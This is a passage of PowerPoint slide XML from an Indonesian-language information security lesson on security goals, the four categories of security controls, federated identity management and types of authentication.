              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disangkal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Manajerial-kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Operasional-kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang-orang. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Teknis-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, firewall, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> antivirus, dan model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik-kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> alarm, gateway, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29302723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Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terfederasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, dan Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpenting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
